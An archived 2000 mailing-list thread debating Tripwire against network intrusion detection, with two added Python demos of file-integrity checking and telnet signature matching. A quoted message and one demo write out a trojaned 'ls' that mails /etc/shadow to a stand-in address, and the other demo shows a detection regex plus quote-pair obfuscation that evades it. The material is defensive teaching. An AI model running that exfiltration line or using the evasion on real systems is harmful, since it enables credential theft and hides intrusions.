RE: [cobalt-users] tripwire
- Subject: RE: [cobalt-users] tripwire
- From: "Mark Spieth" <mspieth@xxxxxxxxxxxx>
- Date: Wed Mar 8 01:53:13 2000
Yes, these things are all true. There is no question that tripwire alone is
not enough, and sure, it is extremely possible to modify things within a
directory that would be hard to monitor using tripwire. I suppose my point
is that tripwire is one more way to secure your server environment. All
these things you mention are great assuming that they DO pick up the
exploit. Assuming some new one comes out and they don't recognize it, it
would at least be nice to know that ls is still ls and not some other
script.
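The check Mark is describing ("ls is still ls") is a file-integrity baseline: record a hash and the metadata of every file under the directories that should not change, keep that record somewhere the attacker cannot rewrite, and later compare. Below is an added, minimal Python version of that idea; it is not Tripwire's own code, and the directory names, the fake `ls` contents and the mail address in the trojan are constructed for the demo.

```python
"""Added example: a minimal Tripwire-style file-integrity check.

Not Tripwire's own code.  It baselines the directories a policy says must
not change (here the demo policy is bin/, sbin/, usr/ under a root), then
verifies hash, size, mode and owner of every file against that baseline.
Paths and the sample "binaries" are constructed for the demo.
"""
import hashlib
import json
import os
import shutil
import stat
import tempfile

# Directories a policy would typically cover: system binaries, not the user
# web trees that legitimately change all day.  (Demo assumption.)
DEFAULT_POLICY = ["bin", "sbin", "usr"]


def _fingerprint(path):
    """Metadata plus SHA-256 of one file; symlinks are recorded by target."""
    st = os.lstat(path)
    rec = {
        "mode": stat.S_IMODE(st.st_mode),
        "uid": st.st_uid,
        "gid": st.st_gid,
        "size": st.st_size,
    }
    if stat.S_ISLNK(st.st_mode):
        rec["link"] = os.readlink(path)
    elif stat.S_ISREG(st.st_mode):
        h = hashlib.sha256()
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(65536), b""):
                h.update(chunk)
        rec["sha256"] = h.hexdigest()
    return rec


def build_baseline(root, policy=DEFAULT_POLICY):
    """Walk each policy directory under root and fingerprint every file."""
    baseline = {}
    for top in policy:
        for dirpath, _dirs, files in os.walk(os.path.join(root, top)):
            for name in files:
                full = os.path.join(dirpath, name)
                baseline[os.path.relpath(full, root)] = _fingerprint(full)
    return baseline


def verify(root, baseline, policy=DEFAULT_POLICY):
    """Compare the tree against the baseline; report added/removed/changed."""
    current = build_baseline(root, policy)
    changed = {}
    for rel in baseline.keys() & current.keys():
        diffs = [k for k in set(baseline[rel]) | set(current[rel])
                 if baseline[rel].get(k) != current[rel].get(k)]
        if diffs:
            changed[rel] = sorted(diffs)
    return {
        "added": sorted(current.keys() - baseline.keys()),
        "removed": sorted(baseline.keys() - current.keys()),
        "changed": changed,
    }


def demo():
    """Build a fake bin/, baseline it, replace `ls` with a trojan, re-verify."""
    root = tempfile.mkdtemp(prefix="fim-demo-")
    try:
        os.makedirs(os.path.join(root, "bin"))
        ls = os.path.join(root, "bin", "ls")
        with open(ls, "wb") as f:
            f.write(b"\x7fELF (constructed stand-in for the real ls binary)\n")
        os.chmod(ls, 0o755)

        baseline = build_baseline(root)
        # The baseline must be kept where the attacker cannot rewrite it
        # (read-only media, a remote host); it is serialised here only to
        # show it is plain data that can be stored anywhere.
        saved = json.dumps(baseline, sort_keys=True)

        # The substitution Mark describes: keep the real ls under another
        # name, and put a script in its place that leaks /etc/shadow first.
        os.rename(ls, ls + ".real")
        with open(ls, "wb") as f:
            f.write(b"#!/bin/sh\n"
                    b"cat /etc/shadow | mail haxor@example.invalid\n"
                    b"exec /bin/ls.real \"$@\"\n")
        os.chmod(ls, 0o755)

        return verify(root, json.loads(saved))
    finally:
        shutil.rmtree(root)
```

`demo()` reports `bin/ls` changed in `sha256` and `size` (the mode is unchanged, which is exactly why a permissions-only check is not enough) and `bin/ls.real` as an added file. Two caveats the thread skirts around: the checker and its baseline are only as trustworthy as the medium they live on, since an attacker who can replace `ls` can also replace the checker or rewrite a writable baseline, and this is detection after the fact, as Geoff says, so it complements rather than replaces watching the network.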
-----Original Message-----
From: cobalt-users-admin@xxxxxxxxxxxxxxx
[mailto:cobalt-users-admin@xxxxxxxxxxxxxxx]On Behalf Of Geoff King
Sent: Tuesday, March 07, 2000 7:22 PM
To: cobalt-users@xxxxxxxxxxxxxxx
Subject: Re: [cobalt-users] tripwire
Mark,
Sorry Mark, but my statement is true.
Yes, directories are defined. Perhaps a hacker modifies files outside
/sbin or whatever directories are being monitored? My point was that you
couldn't possibly monitor the entire directory structure on a heavily used
server.
You should take a look again at packet monitoring software. They
monitor for key signatures that would indicate an exploit is being done
(i.e. the remote BIND exploit, for example) or the many WU-FTPD exploits or
the many web CGI exploits, etc, etc, etc... I know that Sessionwall-3 does
this as I have used it extensively. I could even write a rule to monitor
for 'cat /etc/passwd' within a telnet session or whatever... No, packet
monitoring software will not tell you whether or not a file has been changed
or modified on a server. However, you do have a log of a user sending/receiving
data that matches a known exploit. Cybercop also has the ability to detect
intrusions and then throw up a bogus server for the hacker to waste his time
on all day thinking they'll get in to some goodie server.
What I was saying about Tripwire is that you will be notified AFTER the
fact that your files have been modified. You will have no indication
beforehand.
This is kind of the same reason people put up security cameras instead
of inventorying all their stuff. It's a heck of a lot easier watching
someone steal something than remembering about the tiny trinket that's been
sitting on the shelf for 3 years. When was the last time you saw it?
Geoff
----- Original Message -----
From: "Mark Spieth" <mspieth@xxxxxxxxxxxx>
To: <cobalt-users@xxxxxxxxxxxxxxx>
Sent: Thursday, March 02, 2000 4:36 PM
Subject: RE: [cobalt-users] tripwire
> Actually this is NOT true. You are supposed to define what directories
> tripwire monitors. You point it to portions of your server that contain
> binary files such as /bin, /sbin, /usr; this is where a hacker is going to
> do things, not in a user's web directory, so the fact that those directories
> change won't affect tripwire.
>
> >> packet sniffing programs like ISS or what my business partner uses
> >> Sessionwall-3
> This only helps to attempt to track down a user. For example, the BIND
> hack allows someone to gain a root shell via port 53, so as far as your
> sniffer goes, it will probably just see DNS traffic. At least if you run
> tripwire, should a hacker modify binaries on your machine, Tripwire will
> notice the fact that the command "ls" has been modified to do this:
>
> cat /etc/shadow | mail haxor@xxxxxxxxxx
> ls
>
>
>
> -----Original Message-----
> From: Geoff King [mailto:geoff@xxxxxxxxxx]
> Sent: Thursday, March 02, 2000 7:31 PM
> To: cobalt-users@xxxxxxxxxxxxxxx
> Subject: Re: [cobalt-users] tripwire
>
>
> Gary,
>
> I have installed Tripwire on a RedHat Linux v5.2 box.
>
> Basically, it's considerably useless on a server that many people use
> because it monitors changes in files, which on a hosting web server
> change quite often.
>
> I have found the best means of monitoring hackers is to obtain a stand
> alone server and use packet sniffing programs like ISS or what my business
> partner uses Sessionwall-3. There's a bunch more out there, I can't think
> of their names off the top of my head.
>
> I thought it was kind of a moot point for Tripwire as you'd only know
> after the hacker gained access and modified files. It's much better
> watching the knock at the door first.
>
> Now, if the server is not used for many things, such as a secondary DNS
> server, and that's it, Tripwire would be a fairly decent tool in that you'd
> definitely know if someone was on there and messing with files that should
> never be changed or modified.
>
> The other thing to do is hack your network yourself. I run Nessus, which
> is an open-source security scanner, about once every 6 months to see what it
> can do. It's a good idea to pay attention to the security announcements.
> Any administrator should know exactly where someone can break into their
> network. Also, an administrator should be able to notice odd or different
> behavior of servers and the network fairly quickly.
>
> Anyways, that's my 2 cents worth on tripwire. Good tool, for specific
> purposes. Don't ignore it, but don't count on it either.
>
> Geoff
>
> ----- Original Message -----
> From: "RHLinux" <rhlinux@xxxxxxxxxxx>
> To: "Cobalt-Users@xxxxxxxxxxxxxxx" <cobalt-users@xxxxxxxxxxxxxxx>
> Sent: Thursday, March 02, 2000 2:55 AM
> Subject: [cobalt-users] tripwire
>
>
> > Has anyone tried installing tripwire on a RaQ2-3?
> >
> > It's supposed to help in tracking would-be attackers etc...
> >
> > http://www.zdnet.com/zdnn/stories/news/0,4586,2453339,00.html
> >
> > Gary
> >
> >
> > _______________________________________________
> > cobalt-users mailing list
> > cobalt-users@xxxxxxxxxxxxxxx
> > To Subscribe or Unsubscribe, please go to:
> > http://list.cobalt.com/mailman/listinfo/cobalt-users
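Geoff's quoted remark that he could write a rule to catch 'cat /etc/passwd' inside a telnet session is the other half of this thread, and it is worth seeing what such a rule actually has to cope with. The block below is an added example, not Sessionwall-3's or any real product's rule engine: a literal content signature run three ways over constructed client-to-server telnet payloads. It shows that a telnet client in character-at-a-time mode delivers one keystroke per packet, so a per-packet rule misses the command until the stream is reassembled, and that a trivially rewritten command with empty quote pairs (which the shell ignores) slips past the literal signature unless the stream is normalised first. The packet captures and the rule name are constructed for the demo.

```python
"""Added example: content-signature matching on a reassembled telnet session.

Not the rule engine of Sessionwall-3 or any real IDS.  It demonstrates the
kind of literal rule Geoff describes, and two practical problems with it:
per-packet matching versus stream reassembly, and shell-level obfuscation.
All packet payloads below are constructed for the demo.
"""
import re

# A literal rule of the kind Geoff describes writing (rule name is made up).
RULES = {
    "etc-passwd-shadow-read": re.compile(rb"cat\s+/etc/(passwd|shadow)"),
}


def match_packets(packets, rules=RULES):
    """Naive matching: each packet payload is checked on its own."""
    hits = set()
    for payload in packets:
        for name, rx in rules.items():
            if rx.search(payload):
                hits.add(name)
    return hits


def match_stream(packets, rules=RULES):
    """Reassemble the client->server byte stream first, then match."""
    stream = b"".join(packets)
    return {name for name, rx in rules.items() if rx.search(stream)}


def normalise_shell(stream):
    """Remove empty quote pairs and backslash-newline continuations, which
    the shell ignores but which defeat a byte-for-byte signature.  This is
    deliberately minimal; a real engine has to handle far more (variables,
    aliases, tab completion, terminal editing keys, ...)."""
    stream = re.sub(rb"''|\"\"", b"", stream)
    stream = re.sub(rb"\\\r?\n", b"", stream)
    return stream


def match_normalised(packets, rules=RULES):
    """Reassemble, normalise the shell input, then match."""
    stream = normalise_shell(b"".join(packets))
    return {name for name, rx in rules.items() if rx.search(stream)}


# Constructed captures of the client->server side of a telnet session.
# 1. Line-mode client: the whole command arrives in one packet.
LINE_MODE = [b"cat /etc/passwd\r\n"]
# 2. Character-at-a-time mode: one keystroke per packet.
CHAR_MODE = [bytes([c]) for c in b"cat /etc/passwd\r\n"]
# 3. Same command with empty quote pairs inserted; the shell runs it as-is.
OBFUSCATED = [b"ca''t /e\"\"tc/pa''sswd\r\n"]
```

`match_packets(LINE_MODE)` fires, `match_packets(CHAR_MODE)` does not, `match_stream(CHAR_MODE)` fires again once the keystrokes are joined, and the obfuscated session only fires after `normalise_shell`. The same limitation is behind Mark's point about a BIND exploit looking like ordinary DNS: a content rule can only be written for an exploit whose bytes are already known, which is why the two approaches in this thread are complementary rather than competing.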